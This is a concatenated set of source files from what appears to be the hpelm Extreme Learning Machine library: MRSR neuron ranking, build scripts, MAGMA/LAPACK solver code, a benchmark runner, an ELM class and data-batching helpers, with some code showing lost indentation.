This function is free software; you can redistribute it and/or
modify it under the terms of the GNU General Public License as
published by the Free Software Foundation; either version 2 of
the License, or any later version.
The function is distributed in the hope that it will be useful,
but WITHOUT ANY WARRANTY; without even the implied warranty of
MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the `GNU
General Public License <http://www.gnu.org/copyleft/gpl.html>`_
for more details.
"""
import numpy as np
def mrsr(X, T, kmax):
    """Multiresponse Sparse Regression: return the order in which regressors
    (columns of X) enter the model for targets T, up to kmax regressors.

    :param X: (n x m) regressor matrix
    :param T: (n x p) target matrix
    :param kmax: maximum number of regressors to rank
    :return: 1-D integer array of column indices of X, in selection order
    """
    n,m = X.shape
    n,p = T.shape
    kmax = min(kmax, m)
    if p > 15:
        # S below has 2**p rows, so cost explodes with the number of targets
        print "Too many targets (%d) - MRSR has O(2^targets) complexity"
        """ print "Reducing to 15 randomly selected targets (6x slowdown)"
        print "Using max 10 targets (1.08x slowdown) recommended"
        ti = np.arange(p)
        np.random.shuffle(ti)
        ti = ti[:15]
        T = T[:,ti]
        p = 15
        """
    i1 = np.array([], dtype = np.int32)  # selected regressor indices, in order
    i2 = np.arange(m).astype(np.int32)   # remaining candidate indices
    XT = np.dot(X.T,T)
    XX = np.zeros([m, m])                # lazily-filled Gram matrix of X
    S = np.ones([2**p, p])               # all +/-1 sign combinations over p targets
    S[0:2**(p-1), 0] = -1
    for j in np.arange(1, p):
        S[:, j] = np.concatenate((S[np.arange(1, 2**p, 2), j-1], S[np.arange(1, 2**p, 2), j-1]))
    # Make the first step: pick the regressor with maximal correlation to T
    A = np.transpose(XT)
    cmax = np.amax(abs(A).sum(0), 0)
    cind = np.argmax(abs(A).sum(0), 0)
    A = np.delete(A, cind, 1)
    ind = int(i2[cind])
    i2 = np.delete(i2, cind)
    i1 = np.append(i1, ind)
    # here Xi1 and Xi2 are just faster alternatives to X[:,i1] and X[:,i2]
    Xi2 = X.copy(order='F')  # column-contiguous copy of X
    Xi2[:, cind:-1] = Xi2[:, cind+1:]; Xi2 = Xi2[:,:-1]  # delete <cind> col
    Xi1 = X[:,ind].reshape((n,1))  # add 1 column at a time
    XX[np.ix_([ind], [ind])] = np.dot(X[:,ind], X[:,ind])
    invXX = 1 / XX[ind, :][ind]
    Wols = invXX * XT[ind, :]
    Yols = np.dot(Xi1, np.reshape(Wols, (1,-1)))
    B = np.dot(Yols.T, Xi2)
    # step length: smallest non-negative ratio over all sign combinations
    G = (cmax+np.dot(S,A))/(cmax+np.dot(S,B))
    g = G[G>=0].min()
    Y = g*Yols
    # Rest of the steps
    for k in np.arange(2,kmax+1):
        #print "calculating rank %d/%d" % (k-1, kmax)
        #print "mrsr %d/%d" % (k+1, kmax)
        A = np.dot((T-Y).T, Xi2)  # true slow
        cmax = np.amax(abs(A).sum(0), 0)
        cind = np.argmax(abs(A).sum(0), 0)
        A = np.delete(A, cind, 1)
        ind = int(i2[cind])
        i2 = np.delete(i2, cind)
        i1 = np.append(i1, ind)
        #Xi1 = np.hstack((Xi1, X[:,ind].reshape((n,1), order='C')))  # slow for large k
        Xi1 = np.hstack((Xi1, X[:,ind].reshape((-1,1))))  # slow for large k
        # extend the Gram matrix with the new regressor's cross-products
        xX = np.dot(X[:, ind].T, Xi1)
        XX[np.ix_([ind], i1)] = xX
        XX[np.ix_(i1, [ind])] = np.reshape(xX, (i1.size, -1))
        v3 = XX.take(i1,axis=0).take(i1,axis=1)  # XX[i1, :][:, i1]
        #v3 = XX[i1, :][:, i1]
        try:
            invXX = np.linalg.inv(v3)
        except np.linalg.linalg.LinAlgError:
            print 'got singular matrix, using pinv()', i1
            invXX = np.linalg.pinv(v3)
        Wols = np.dot(invXX, XT.take(i1,axis=0))
        Yols = np.dot(Xi1, Wols)  # true slow
        # deletes [cind] row, slow for large k
        Xi2[:, cind:-1] = Xi2[:, cind+1:]; Xi2 = Xi2[:,:-1]
        B = np.dot((Yols-Y).T, Xi2)  # true slow
        G = (cmax + S.dot(A)) / (cmax + S.dot(B))  # true slow for many outputs
        # now we remove that line using a condition:
        # G = numpy.concatenate(([2*(k==m)-1], G.flatten()), 1)
        if k == kmax:  # G[G>=0] is empty if k==kmax; empty.min() will give error
            Y = Yols
        else:
            g = G[G>=0].min()
            Y = (1-g)*Y+g*Yols
    return i1
<file_sep># -*- coding: utf-8 -*-
"""
Created on Sat Oct 18 17:21:12 2014
@author: akusok
"""
from setuptools import setup, Extension
#from distutils.core import setup
def readme():
    """Return the contents of README.rst for use as the long description."""
    with open('README.rst') as handle:
        text = handle.read()
    return text
# Package metadata for hpelm; note the Python 2.7 classifier -- the code
# base uses Python 2 syntax throughout.
setup(name='hpelm',
      version='0.6.22',
      description='High-Performance implementation of an\
Extreme Learning Machine',
      long_description=readme(),
      classifiers=[
          'Development Status :: 4 - Beta',
          'Environment :: Console',
          'Intended Audience :: Science/Research',
          'License :: OSI Approved :: BSD License',
          'Natural Language :: English',
          'Operating System :: OS Independent',
          'Programming Language :: Python :: 2.7',
          'Topic :: Scientific/Engineering :: Information Analysis',
      ],
      keywords='ELM HPC regression classification ANN',
      url='https://www.researchgate.net/profile/Anton_Akusok',
      author='<NAME>',
      author_email='<EMAIL>',
      license='BSD (3-clause)',
      packages=['hpelm',
                'hpelm.modules',
                'hpelm.tests',
                'hpelm.acc'],
      install_requires=[
          'numpy',
          'numexpr',
          'scipy>=0.12',
          'tables',
          'cython'
      ],
      scripts=['bin/elm_naive.py'],
      test_suite='nose.collector',
      tests_require=['nose'],
      include_package_data=True,
      zip_safe=False)
<file_sep># -*- coding: utf-8 -*-
"""
Created on Thu Nov 6 16:15:27 2014
@author: akusok
"""
def gen(k=None):
    # Demo generator: the "finalizing" line after the yield loop runs only
    # when the generator is iterated to exhaustion.
    print "starting"
    for i in range(3):
        print "generating i: ", i
        yield i
    print "finalizing", k

def gen2():
    # Returns a plain value together with a not-yet-started generator.
    d = 1
    return d, gen()

###############################
g = gen()
print list(g) # finalizes!
###############################
g = gen()
for g1 in g:
    print g1 # finalizes!
###############################
d,g = gen2()
print "d = ", d
for g1 in g:
    print g1
###############################
# zip() stops once the shorter iterator raises StopIteration, so the
# second generator is never exhausted.
f = gen('f')
g = gen('g')
for a,b in zip(f,g):
    print a,b # only F finalizes!
###############################
print "+++++++++++++++++"
f = gen('f')
g = gen('g')
for a in f:
    b = g.next()
    print a,b # only F finalizes!
print "#################"
print "#################"
class C1():
    # `a` is defined here; `pb` relies on a subclass or instance
    # supplying `b`.
    a = 3
    def pa(self):
        print "local a is", self.a
    def pb(self):
        print "non-local b is", self.b

class C2(C1):
    b = 5

c2 = C2()
c2.pa()
c2.pb()
c1 = C1()
c1.pa()
<file_sep>#!/usr/bin/env python
from distutils.core import setup
from distutils.extension import Extension
import commands
def pkgconfig(*packages, **kw):
    """Collect pkg-config flags for `packages` into distutils Extension
    keyword arguments (Python 2 only: uses the `commands` module)."""
    # map pkg-config flag prefixes to Extension keyword names
    flag_map = {'-I': 'include_dirs', '-L': 'library_dirs', '-l': 'libraries'}
    for token in commands.getoutput("pkg-config --libs --cflags %s" % ' '.join(packages)).split():
        if token[:2] in flag_map:
            kw.setdefault(flag_map.get(token[:2]), []).append(token[2:])
        else:
            # anything that is not -I/-L/-l is passed through as a raw flag
            kw.setdefault('extra_compile_args', []).append(token)
    return kw

print pkgconfig("magma")
<file_sep>#include "magma.h"
// Minimal GPU least-squares solver interface (MAGMA-backed, see magma.h).
class GpuSolver {
  public:
    GpuSolver( int, int );                           // problem dimensions
    ~GpuSolver();
    void add_data( int m, double* X, double* T );    // accumulate m samples
    void solve( double* X );                         // write solution into X
};
<file_sep>#include "magma.h"
// Extended GPU solver interface: correlation matrices A, B are provided by
// the caller and can be read back with get_corr().
class GpuSolver {
  public:
    GpuSolver( int, int, double* A, double* B );
    void add_data( int m, double* X, double* T );    // accumulate m samples
    void get_corr( double* XX, double* XT );         // copy out correlations
    void solve( double* X );                         // write solution into X
    void finalize();                                 // release GPU resources
};

// Solve the n x n correlated system A*X = B for nrhs right-hand sides.
void solve_corr( int n, int nrhs, double* A, double* B, double* X );
<file_sep>#!/usr/bin/env python
from distutils.core import setup
from distutils.extension import Extension
from Cython.Distutils import build_ext
import commands
import numpy
def pkgconfig(*packages, **kw):
    """Returns nicely organized stuff from PKGCONFIG.
    Found on the internet, returns a dictionary with
    libraries, library dirs, include dirs, extra arguments
    To test, run in terminal: "pkg-config --libs --cflags magma"
    To add "magma" to pkg-config:
    export PKG_CONFIG_PATH=$PKG_CONFIG_PATH:/usr/local/magma/lib/pkgconfig
    use your own path to installed magma + lib/pkgconfig
    (Python 2 only: uses the `commands` module.)
    """
    # map pkg-config flag prefixes to Extension keyword names
    flag_map = {'-I': 'include_dirs', '-L': 'library_dirs', '-l': 'libraries'}
    for token in commands.getoutput("pkg-config --libs --cflags %s" % ' '.join(packages)).split():
        if token[:2] in flag_map:
            kw.setdefault(flag_map.get(token[:2]), []).append(token[2:])
        else:
            # non -I/-L/-l tokens are passed through as raw compiler flags
            kw.setdefault('extra_compile_args', []).append(token)
    return kw
# Build the Cython extension "magma_solver" against MAGMA, with all
# compiler/linker settings pulled from pkg-config (see pkgconfig above).
setup(cmdclass={'build_ext': build_ext},
      ext_modules=[
          Extension(
              "magma_solver",
              sources=["magma_solver.pyx",
                       "gpu_solver.cpp"],
              language="c++",
              extra_compile_args=pkgconfig("magma")["extra_compile_args"],
              include_dirs=[numpy.get_include()] + pkgconfig("magma")["include_dirs"],
              libraries=pkgconfig("magma")["libraries"],
              library_dirs=pkgconfig("magma")["library_dirs"])
      ]
      )
"""
setup(cmdclass = {'build_ext': build_ext},
ext_modules = [
Extension("magma_solver",
sources = ["magma_solver.pyx", "gpu_solver.cpp"],
language="c++",
extra_compile_args=["-DADD_ -DHAVE_CUBLAS"],
include_dirs = [numpy.get_include(),
"/usr/local/magma/include",
"/usr/local/cuda-6.5/include",
"/opt/intel/composerxe/mkl/include"],
libraries = ["magma",
"mkl_intel_lp64",
"mkl_intel_thread",
"mkl_core",
"iomp5",
"pthread",
"cublas",
"cudart",
"stdc++",
"gfortran",
"m"],
library_dirs = ["/usr/local/magma/lib",
"/opt/intel/composerxe/mkl/lib/intel64",
"/usr/local/cuda-6.5/lib64",
"/opt/intel/composerxe/lib/intel64"]
)
]
)
"""<file_sep>#include <math.h>
#include <stdio.h>
#include <stdlib.h>
#include <Accelerate/Accelerate.h> // replace with proper Lapack headers
/* Load n*d doubles from "X.bin" into the caller-provided buffer X.
 * NOTE(review): fopen/fread results are not checked; a missing file
 * crashes on fread(NULL, ...). */
void load_file(double *X, int n, int d)
{
    FILE *myfile;
    myfile = fopen("X.bin","r");
    fread(X, sizeof(double), n*d, myfile);
    fclose(myfile);
    printf("X: \n");
    /*for (int i=0; i<M; i++) {
        for (int j=0; j<N; j++) {
            printf("%f ", U[i + j*M]);
        }
        printf("\n");
    }*/
}
/* Benchmark/demo: SVD (dgesvd) of A read from "A.bin", then the product
 * A^T * B via cblas_dgemm, all in LAPACK column-major layout.
 * NOTE(review): throwaway code -- heap buffers are never freed and
 * fopen results are unchecked. */
void my_lls()
{
    // M - number of samples
    // N - number of columns
    int M = 10000;
    int N = 5;
    int d = sizeof(double);
    double *A = (double*) malloc(M*N*d);
    double *s = (double*) malloc(N*d);
    double *U = (double*) malloc(M*N*d);
    double *VT = (double*) malloc(N*N*d);
    FILE *myfile;
    myfile = fopen("A.bin","r");
    fread(A, d, M*N, myfile);
    fclose(myfile);
    char S = 'S';
    /* workspace size: max(3*min(M,N)+max(M,N), 5*min(M,N)) per dgesvd docs */
    int lwork = M + 3*N;
    lwork = (lwork < 5*N) ? 5*N : lwork;
    double *work = (double*) malloc(lwork*d);
    int info;
    // correct SVD
    dgesvd_(&S, &S, &M, &N, A, &M, s, U, &M, VT, &N, work, &lwork, &info);
    //*********************************************************************
    /* dgesvd destroys A, so reload it before the GEMM check */
    myfile = fopen("A.bin","r");
    fread(A, d, M*N, myfile);
    fclose(myfile);
    int K = 2;
    double *B = (double*) malloc(M*K*d);
    for (int i=0; i<M; i++) {
        B[i] = A[i];
        B[M+i] = A[M+i];
    }
    double *C = (double*) malloc(N*K*d);
    // correct dgemm
    cblas_dgemm(CblasColMajor, CblasTrans, CblasNoTrans, N, K, M, 1.0, A, M, B, M, 0.0, C, N);
    //*********************************************************************
    /*
    for (int i=0; i<M; i++) {
        for (int j=0; j<N; j++) {
            printf("%f ", U[i + j*M]);
        }
        printf("\n");
    }
    */
}
/* Solve the least-squares problem H*W = Y with LAPACK dgelss (SVD based):
 * H (M x N) is read from "H.bin", Y (M x K) from "Y.bin", and the N x K
 * solution W is written to "W.bin"; prints the LAPACK `info` code.
 *
 * Fixes over the previous version:
 *   - Y.bin was read with count M*N (50000 doubles) into a buffer of only
 *     M*K (20000) doubles -- a heap buffer overflow; now reads M*K.
 *   - fopen results are checked; all heap buffers are freed.
 */
void my_new()
{
    FILE *myfile;
    int M = 10000;   /* number of samples (rows)          */
    int N = 5;       /* number of columns of H            */
    int K = 2;       /* number of target columns of Y     */
    int d = sizeof(double);
    double* H = (double*) malloc(M*N*d);
    double* Y = (double*) malloc(M*K*d);
    double* s = (double*) malloc(N*d);
    double rcond = -1.0;   /* negative: use machine precision for rank */
    int rank;
    int info;
    myfile = fopen("H.bin","r");
    if (myfile == NULL) { printf("cannot open H.bin\n"); free(H); free(Y); free(s); return; }
    fread(H, d, M*N, myfile);
    fclose(myfile);
    myfile = fopen("Y.bin","r");
    if (myfile == NULL) { printf("cannot open Y.bin\n"); free(H); free(Y); free(s); return; }
    fread(Y, d, M*K, myfile);   /* was M*N: overflowed the M*K buffer */
    fclose(myfile);
    /* workspace query: lwork = -1 returns the optimal size in work[0] */
    int lwork = -1;
    double query;
    dgelss_(&M, &N, &K, H, &M, Y, &M, s, &rcond, &rank, &query, &lwork, &info); // lwork query
    lwork = (int) query;
    double *work = (double*) malloc(lwork*d);
    // correct Least Squares Solution; result overwrites the top N rows of Y
    dgelss_(&M, &N, &K, H, &M, Y, &M, s, &rcond, &rank, work, &lwork, &info);
    // return projection matrix (leading dimension of Y is M)
    double* W = (double*) malloc(N*K*d);
    for (int i=0; i<N; i++) {
        for (int j=0; j<K; j++) {
            W[i + j*N] = Y[i + j*M];
        }
    }
    myfile = fopen("W.bin","w");
    if (myfile != NULL) {
        fwrite(W, d, N*K, myfile);
        fclose(myfile);
    }
    printf("%d\n", info);
    free(H); free(Y); free(s); free(work); free(W);
}
/* Entry point: run the dgelss least-squares demo. */
int main(void)
{
    my_new();
    return 0;
}
<file_sep># -*- coding: utf-8 -*-
"""
Created on Tue Apr 14 20:15:12 2015
@author: akusok
"""
import numpy as np
import os
import hpelm
import cPickle
import sys
from time import time
def elm(folder, i, nn, param):
    """Train one ELM on split i+1 of a dataset folder.

    :param folder: directory with xtrain_*/xtest_*/ytrain_*/ytest_* .npy files
    :param i: zero-based split index (file names are numbered from 1)
    :param nn: requested number of sigmoid neurons (capped at N/2 below)
    :param param: extra positional args for ELM.train ('c', 'loo', 'OP', ...)
    :returns: (test error, neuron counts per type, wall-clock seconds)
    """
    # folder = os.path.join(os.path.dirname(__file__), folder)
    # acc = np.empty((10, 3))
    # get file names
    Xtr = np.load(os.path.join(folder, "xtrain_%d.npy" % (i + 1)))
    Xts = np.load(os.path.join(folder, "xtest_%d.npy" % (i + 1)))
    Ttr = np.load(os.path.join(folder, "ytrain_%d.npy" % (i + 1)))
    Tts = np.load(os.path.join(folder, "ytest_%d.npy" % (i + 1)))
    # create validation set
    # N = Xtr.shape[0]
    # ix = np.arange(N)
    # np.random.shuffle(ix)
    # Xvl = Xtr[ix[:N/5]]
    # Tvl = Ttr[ix[:N/5]]
    # Xtr = Xtr[ix[N/5:]]
    # Ttr = Ttr[ix[N/5:]]
    # elm.add_neurons(Xtr.shape[1], "lin")
    # W, B = hpelm.modules.rbf_param(Xtr, nn, "l2")
    # elm.add_neurons(nn, "rbf_l2", W, B)
    # at most half as many neurons as training samples (Python 2 int division)
    nn = min(nn, Xtr.shape[0]/2)
    t = time()
    # build ELM
    elm = hpelm.ELM(Xtr.shape[1], Ttr.shape[1])
    elm.add_neurons(nn, "sigm")
    # train ELM
    elm.train(Xtr, Ttr, *param)
    Yts = elm.predict(Xts)
    err = elm.error(Yts, Tts)
    t = time() - t
    # number of neurons of each type actually kept by the model
    nns = [l[1] for l in elm.neurons]
    return err, nns, t
def trainer(folder, cls=False):
    """Run 10 splits comparing plain ELM, LOO model selection, and OP+LOO
    pruning; pickle (mean errors, stds, mean neuron counts, mean times).

    :param folder: dataset directory (see `elm`)
    :param cls: True for classification datasets (adds 'c' to train args)
    """
    nn = 100
    errs = np.zeros((10, 3))
    # NOTE(review): np.int is removed in NumPy >= 1.24; fine on the
    # project's pinned Python 2 stack
    neurs = np.zeros((10, 3), dtype=np.int)
    times = np.zeros((10, 3))
    if cls:
        param = ['c']
    else:
        param = []
    for i in xrange(10):
        print i
        # column 0: basic ELM
        e, l, t = elm(folder, i, nn, param)
        errs[i, 0] = e
        neurs[i, 0] = l[0]
        times[i, 0] = t
        # column 1: leave-one-out (PRESS) model selection
        e, l, t = elm(folder, i, nn, param+['loo'])
        errs[i, 1] = e
        neurs[i, 1] = l[0]
        times[i, 1] = t
        # column 2: optimal pruning + leave-one-out
        e, l, t = elm(folder, i, nn, param+['OP', 'loo'])
        errs[i, 2] = e
        neurs[i, 2] = l[0]
        times[i, 2] = t
    stds = errs.std(0)
    errs = errs.mean(0)
    neurs = neurs.mean(0)
    times = times.mean(0)
    fname = folder+".pkl"
    cPickle.dump((errs, stds, neurs, times), open(fname, "wb"), -1)
if __name__ == "__main__":
    # (dataset folder, is_classification) pairs, selected by index argv[1]
    datas = (("Classification-Iris", True),
             ("Classification-Pima_Indians_Diabetes", True),
             ("Classification-Wine", True),
             ("Classification-Wisconsin_Breast_Cancer", True),
             ("Regression-Abalone", False),
             ("Regression-Ailerons", False),
             ("Regression-Auto_price", False),
             ("Regression-Bank", False),
             ("Regression-Boston", False),
             ("Regression-Breast_cancer", False),
             ("Regression-Computer", False),
             ("Regression-CPU", False),
             ("Regression-Elevators", False),
             ("Regression-Servo", False),
             ("Regression-Stocks", False))
    j = int(sys.argv[1])
    f1, c1 = datas[j]
    # NOTE(review): hard-coded local path; adjust for other machines
    f1 = "/Users/akusok/Dropbox/Documents/X-ELM/hpelm/datasets/" + f1
    trainer(f1, c1)
<file_sep># -*- coding: utf-8 -*-
"""
Created on Mon Oct 27 17:48:33 2014
@author: akusok
"""
import numpy as np
import numexpr as ne
from scipy.spatial.distance import cdist
from multiprocessing import Pool, cpu_count
import os
from slfn import SLFN
class parallel_cdist(object):
    """Picklable distance functor for use with multiprocessing.Pool.

    Stores the transposed centroid matrix W.T and a cdist metric name;
    calling the instance on a chunk of rows X yields the pairwise
    distance matrix cdist(X, W.T, metric).
    """

    def __init__(self, W, kind):
        # keep centroids as rows, the layout cdist expects
        self.C = W.T
        self.kind = kind

    def __call__(self, X):
        distances = cdist(X, self.C, self.kind)
        return distances
class ELM(SLFN):
"""Non-parallel Extreme Learning Machine.
"""
# inherited def __init__(self, inputs, outputs):
# inherited def _checkdata(self, X, T):
# inherited def add_neurons(self, number, func, W=None, B=None):
# inherited def project(self, X):
# inherited def predict(self, X):
# inherited def save(self, model):
# inherited def load(self, model):
def _mp_project(X, W, B, k, kind):
pcdist = parallel_cdist(W, kind)
# fix issues with running everything on one core
os.system("taskset -p 0xff %d >/dev/null" % os.getpid())
p = Pool(k)
H0 = p.map(pcdist, np.array_split(X, k, axis=0))
H0 = np.vstack(H0) / (-2 * (B ** 2))
p.close()
return H0
    def project(self, X):
        """Compute the hidden-layer output H for inputs X.

        RBF neuron types are projected in parallel over all CPU cores via
        _mp_project; all other types use a plain affine projection.  The
        per-type outputs are transformed with numexpr and stacked
        horizontally into one matrix H.
        """
        # assemble global hidden layer output
        H = []
        for func, ntype in self.neurons.iteritems():
            _, W, B = ntype
            k = cpu_count()
            # projection
            if func == "rbf_l2":
                H0 = self._mp_project(X, W, B, k, "sqeuclidean")
            elif func == "rbf_l1":
                H0 = self._mp_project(X, W, B, k, "cityblock")
            elif func == "rbf_linf":
                H0 = self._mp_project(X, W, B, k, "chebyshev")
            else:
                H0 = X.dot(W) + B
            # transformation (in place, via numexpr)
            if func == "lin":
                pass
            elif "rbf" in func:
                ne.evaluate('exp(H0)', out=H0)
            elif func == "sigm":
                ne.evaluate("1/(1+exp(-H0))", out=H0)
            elif func == "tanh":
                ne.evaluate('tanh(H0)', out=H0)
            else:
                H0 = func(H0)  # custom <numpy.ufunc>
            H.append(H0)
        H = np.hstack(H)
        return H
def train(self, X, T):
"""Learn a model to project inputs X to targets T.
:param X: - matrix of inputs
:param T: - matrix of targets
"""
assert len(self.neurons) > 0, "Add neurons before training ELM"
X, T = self._checkdata(X, T)
H = self.project(X)
self.Beta = np.linalg.pinv(H).dot(T)
''' COPY OF OLD PRUNING METHODS
def prune_op(self, X, T, batch=10000, delimiter=" "):
"""Prune ELM as in OP-ELM paper.
"""
# get data iterators
genX, self.inputs, N = batchX(X, batch, delimiter)
genT, self.targets = batchT(T, batch, delimiter, self.C_dict)
# project data
nn = len(self.ufunc)
delta = 0.95 # improvement of MSE for adding more neurons
nfeats = []
neurons = np.zeros((nn,))
for X1,T1 in zip(genX, genT):
# get hidden layer outputs
H = np.dot(X1,self.W)
for i in xrange(H.shape[1]):
H[:,i] = self.ufunc[i](H[:,i])
H,T1 = semi_Tikhonov(H,T1,self.Tmean) # add Tikhonov regularization
# get ranking of neurons in that batch
rank = mrsr(H, T1, nn)
# select best number of neurons
MSE = press(H[:, rank[:2]], T1, self.classification, self.multiclass)
R_opt = rank[:2]
early_stopping = int(nn/10) + 1 # early stopping if no improvement in 10% neurons
last_improvement = 0
for i in range(3, nn):
last_improvement += 1
r = rank[:i]
mse1 = press(H[:,r], T1, self.classification, self.multiclass)
if mse1 < MSE * delta:
MSE = mse1
R_opt = r
last_improvement = 0
elif last_improvement > early_stopping: # early stopping if MSE raises
break
r = R_opt
# save number of neurons and their ranking information
nfeats.append(len(r))
# first selected neuron gets weight 2, last one gets weight 1
neurons[r] += np.linspace(2,1,num=len(r))
# combine neuron ranking
nfeats = np.round(np.mean(nfeats))
neurons = np.argsort(neurons)[::-1][:nfeats] # sorting in descending order
# update ELM parameters and re-calculate B
self.W = self.W[:,neurons]
self.ufunc = [self.ufunc[j] for j in neurons]
self.train(X, T, batch=batch, delimiter=delimiter)
def prune_op2(self, X, T, norm=1, batch=10000, delimiter=" "):
"""Prune ELM with a more recent implementation of MRSR.
:param norm: - check numpy.linalg.norm(X, <norm>)
"""
# get data iterators
genX, self.inputs, N = batchX(X, batch, delimiter)
genT, self.targets = batchT(T, batch, delimiter, self.C_dict)
# project data
nn = len(self.ufunc)
delta = 0.95 # improvement of MSE for adding more neurons
nfeats = []
neurons = np.zeros((nn,))
for X1,T1 in zip(genX, genT):
# get hidden layer outputs
H = np.dot(X1,self.W)
for i in xrange(H.shape[1]):
H[:,i] = self.ufunc[i](H[:,i])
H,T1 = semi_Tikhonov(H,T1,self.Tmean) # add Tikhonov regularization
# get ranking of neurons in that batch
# this MRSR2 is a class, with <.rank> attribute and <.new_input()> method
M = mrsr2(H, T1, norm)
M.new_input()
M.new_input()
# select best number of neurons
MSE = press(H[:, M.rank], T1, self.classification, self.multiclass)
R_opt = M.rank
early_stopping = int(nn/10) + 1 # early stopping if no improvement in 10% neurons
last_improvement = 0
for i in range(3, nn):
last_improvement += 1
M.new_input()
mse1 = press(H[:, M.rank], T1, self.classification, self.multiclass)
if mse1 < MSE * delta:
MSE = mse1
R_opt = M.rank
last_improvement = 0
elif last_improvement > early_stopping: # early stopping if MSE raises
break
rank = R_opt
del M
# save number of neurons and their ranking information
nfeats.append(len(rank))
# first selected neuron gets weight 2, last one gets weight 1
neurons[rank] += np.linspace(2,1,num=len(rank))
# combine neuron ranking
nfeats = np.round(np.mean(nfeats))
neurons = np.argsort(neurons)[::-1][:nfeats] # sorting in descending order
# update ELM parameters and re-calculate B
self.W = self.W[:,neurons]
self.ufunc = [self.ufunc[j] for j in neurons]
self.train(X, T, batch=batch, delimiter=delimiter)
'''
<file_sep># -*- coding: utf-8 -*-
"""
Created on Wed Nov 5 13:54:55 2014
@author: akusok
"""
import numpy as np
from tables import openFile
def encode(data, cdict):
    """Encode 1-dim class labels into the binary coding given by `cdict`.

    :param data: iterable of class labels; a 2-d numpy array is flattened
    :param cdict: dict mapping each class label to its binary target row
    :returns: 2-d array with one encoded row per input label
    :raises IOError: if a label is missing from `cdict` (a class never
        seen in training)
    """
    if isinstance(data, np.ndarray) and (len(data.shape) == 2):
        data = data.ravel()
    try:
        data = np.vstack([cdict[cls] for cls in data])
    except KeyError:
        # only an unknown class is expected here; the previous bare
        # `except:` also masked unrelated errors with this message
        raise IOError("Test targets cannot have classes not presented in training")
    return data
def decode(data, cdict):
    """Transform binary (one-hot) coding back into original 1-dim classes."""
    # invert the class dictionary: index of the hot bit -> class label
    inverse = {}
    for label, code in cdict.items():
        inverse[np.argmax(code)] = label
    indices = np.argmax(data, 1)
    return [inverse[i] for i in indices]
def np_generator(D, batch, add_bias=False, c_dict=None):
    """Returns numpy array part-by-part.

    Optionally appends a bias column of ones, or one-hot encodes class
    targets with `c_dict` (the two options are mutually exclusive).
    Python 2 only: relies on integer `/` division and xrange.
    """
    N = len(D)
    nb = N/batch
    if N > nb*batch:
        nb += 1  # add last incomplete step
    for b in xrange(nb):
        start = b*batch
        step = min(batch, N-start)
        D1 = D[start: start+step]
        if add_bias:
            D1 = np.hstack((D1, np.ones((step, 1), dtype=D.dtype)))
        elif c_dict is not None:
            D1 = encode(D1, c_dict)
        yield D1

def hdf5_generator(h5, node, batch, add_bias=False, c_dict=None):
    """Reads and returns HDF5 file array part-by-part.

    Same options as np_generator; the open `h5` file is closed after the
    last chunk has been produced.
    """
    N = node.shape[1]  # HDF5 files are transposed, for Matlab compatibility
    nb = N/batch
    if N > nb*batch:
        nb += 1  # add last incomplete step
    for b in xrange(nb):
        start = b*batch
        step = min(batch, N-start)
        D1 = node[:, start: start+step].T
        if add_bias:
            D1 = np.hstack((D1, np.ones((step, 1), dtype=D1.dtype)))
        elif c_dict is not None:
            D1 = encode(D1, c_dict)
        if start+step == N:
            h5.close()  # closing file on last iteration
        yield D1
def batchX(X, batch=10000, delimiter=" "):
    """Iterates over data X from whatever source.
    batch < 0 means return a matrix instead of iterator

    Accepts an HDF5 file (*.h5, read lazily), a text/compressed text file,
    a *.npy file, or an in-memory array; a bias column of ones is always
    appended.  Returns (batch generator or matrix, inputs, N).
    """
    if isinstance(X, basestring) and (X[-3:] == ".h5"):  # read partially from HDF5
        h5 = openFile(X)
        for node in h5.walk_nodes():  # find a node with whatever name
            pass
        inputs = node.shape[0]  # HDF5 files are transposed, for Matlab compatibility
        N = node.shape[1]
        if batch > 0:
            bX = hdf5_generator(h5, node, batch, add_bias=True)
        else:
            D = node[:].T
            bX = np.hstack((D, np.ones((N, 1), dtype=D.dtype)))
    else:  # load whole X into memory
        # load text file
        if isinstance(X, basestring):  # any other file - must be .txt (compressed) file
            if X[-3:] in ["txt", ".gz", "bz2"]:
                X = np.loadtxt(X, delimiter=delimiter)
            elif X[-3:] in ['npy']:
                X = np.load(X)
            else:
                raise IOError("Input file X should be text (*.txt), " +
                              "a compressed text (*.gz/*.bz2), an HDF5 file " +
                              "(*.h5), or Numpy binary (*.npy)")
        if not isinstance(X, np.ndarray):
            X = np.array(X)
        if len(X.shape) == 1:
            X = X.reshape(-1, 1)  # add second dimension
        inputs = X.shape[1]
        N = X.shape[0]
        if batch > 0:
            bX = np_generator(X, batch, add_bias=True)
        else:
            bX = np.hstack((X, np.ones((N, 1), dtype=X.dtype)))
    # return data
    return bX, inputs, N
def batchT(T, batch=10000, delimiter=" ", c_dict=None):
    """Iterates over targets T with correct transformation.
    batch < 0 means return a matrix instead of iterator
    :param C_dict: - dictionary of classes for single-class classification,
        implies the classification task

    Same input sources as batchX; classification targets are one-hot
    encoded via `c_dict`.  Returns (batch generator or matrix, targets).
    """
    if isinstance(T, basestring) and (T[-3:] == ".h5"):  # read partially from HDF5
        h5 = openFile(T)
        for node in h5.walk_nodes():  # find a node with whatever name
            pass
        targets = node.shape[0]  # HDF5 files are transposed, for Matlab compatibility
        if batch > 0:
            bT = hdf5_generator(h5, node, batch, c_dict=c_dict)
        else:
            bT = node[:].T
            if c_dict is not None:
                bT = encode(bT, c_dict)
    else:  # load whole T into memory
        # load text file
        if isinstance(T, basestring):  # any other file - must be .txt (compressed) file
            if T[-3:] in ["txt", ".gz", "bz2"]:
                T = np.loadtxt(T, delimiter=delimiter)
            elif T[-3:] in ['npy']:
                T = np.load(T)
            else:
                raise IOError("Targets file T should be text (*.txt), " +
                              "a compressed text (*.gz/*.bz2), an HDF5 file " +
                              "(*.h5), or Numpy binary (*.npy)")
        if c_dict is None:  # classification targets have their special treatment
            if not isinstance(T, np.ndarray):
                T = np.array(T)
            if len(T.shape) == 1:
                T = T.reshape(-1, 1)  # add second dimension
            targets = T.shape[1]
        if batch > 0:
            bT = np_generator(T, batch, c_dict=c_dict)
        else:
            bT = T
            if c_dict is not None:
                bT = encode(bT, c_dict)
    # return data
    if c_dict is not None:
        targets = len(c_dict)  # classification targets are unique classes
    return bT, targets
def meanstdX(X, batch=10000, delimiter=" "):
    """Computes mean and standard deviation of X, skips binary features.
    Only works with batch.

    HDF5 inputs are processed in streaming fashion accumulating E[x] and
    E[x^2]; anything else is loaded fully into memory.  Features detected
    as binary keep mean 0 / std 1 so they are not normalized.
    """
